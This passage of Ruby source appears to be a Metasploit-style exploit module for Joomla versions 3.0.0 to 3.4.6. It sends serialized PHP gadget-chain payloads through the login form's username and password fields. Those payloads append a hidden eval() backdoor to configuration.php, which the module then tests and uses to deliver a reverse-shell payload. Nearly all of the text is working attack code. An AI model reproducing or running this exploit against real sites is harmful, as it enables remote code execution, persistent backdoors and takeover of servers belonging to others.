function).gsub('FUNC_LEN', function.length.to_s) return final end def get_payload_backdoor(param_name) # return the backdoor payload # or better, the payload that will inject and eval function in configuration.php (in the root) # As said in other part of the code. we cannot create new .php file because we cannot use # the ? 
character because of the check on URI schema function = 'assert' template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # This payload will append an eval() at the end of the configuration file payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';" template['PAYLOAD'] = payload template['LENGTH'] = payload.length.to_s template['FUNC_NAME'] = function template['FUNC_LEN'] = function.length.to_s return template end def check_by_exploiting # Check that is vulnerable by exploiting it and try to inject a printr('something') # Get the Session anb CidSRF Tokens sess_token = get_session_token() csrf_token = get_csrf_token(sess_token) print_status('Testing with a POC object payload') username_payload = '\\0\\0\\0' * 9 password_payload = 'AAA";' # close the prev object password_payload += get_payload('print_r','IAMSODAMNVULNERABLE') # actual payload password_payload += 's:6:"return":s:102:' # close cleanly the object res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'method' => 'POST', 'headers' => { 'Cookie' => sess_token, }, 'vars_post' => { 'username' => username_payload, 'password' => password_payload, 'option' => 'com_users', 'task' => 'user.login', csrf_token => '1', } }) # Redirect in order to retrieve the output if res.redirection then res_redirect = send_request_cgi({ 'method' => 'GET', 'uri' => res.redirection.to_s, 'headers' =>{ 'Cookie' => sess_token } }) if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? 
res_redirect.to_s then return true else return false end end end def check # Check if the target is UP and get the current version running by info leak res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')}) unless res print_error("Connection timed out") return Exploit::CheckCode::Unknown end # Parse XML to get the version if res.code == 200 then xml = res.get_xml_document version = xml.at('version').text print_status('Identified version ' + version) if version <= '3.4.6' and version >= '3.0.0' then if check_by_exploiting() return Exploit::CheckCode::Vulnerable else if check_by_exploiting() then # Try the POC 2 times. return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end else return Exploit::CheckCode::Safe end else print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable') if check_by_exploiting() then return Exploit::CheckCode::Vulnerable else if check_by_exploiting() then return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end end end def exploit if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target is not vulnerable') return end pwned = false cmd_param_name = get_random_string(50) sess_token = get_session_token() csrf_token = get_csrf_token(sess_token) # In order to avoid problems with disabled functions # We are gonna append an eval() function at the end of the configuration.php file # This will not cause any problem to Joomla and is a good way to execute then PHP directly # cuz assert is toot annoying and with conditions that we have we cannot inject some characters # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server. 
# TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file # Use the implanted backdoor to receive a nice little reverse shell with a PHP payload # Implant the backdoor vprint_status('Cooking the exploit ..') username_payload = '\\0\\0\\0' * 9 password_payload = 'AAA";' # close the prev object password_payload += get_payload_backdoor(cmd_param_name) # actual payload password_payload += 's:6:"return":s:102:' # close cleanly the object print_status('Sending exploit ..') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'method' => 'POST', 'headers' => { 'Cookie' => sess_token }, 'vars_post' => { 'username' => username_payload, 'password' => password_payload, 'option' => 'com_users', 'task' => 'user.login', csrf_token => '1' } }) print_status('Triggering the exploit ..') if res.redirection then res_redirect = send_request_cgi({ 'method' => 'GET', 'uri' => res.redirection.to_s, 'headers' =>{ 'Cookie' => sess_token } }) end # Ping the backdoor see if everything is ok :/ res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'configuration.php'), 'vars_post' => { cmd_param_name => 'echo \'PWNED\';' } }) if res.to_s.include? 'PWNED' then print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST') pwned = true end if pwned then print_status('Now it\'s time to reverse shell') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'configuration.php'), 'vars_post' => { cmd_param_name => payload.encoded } }) end end end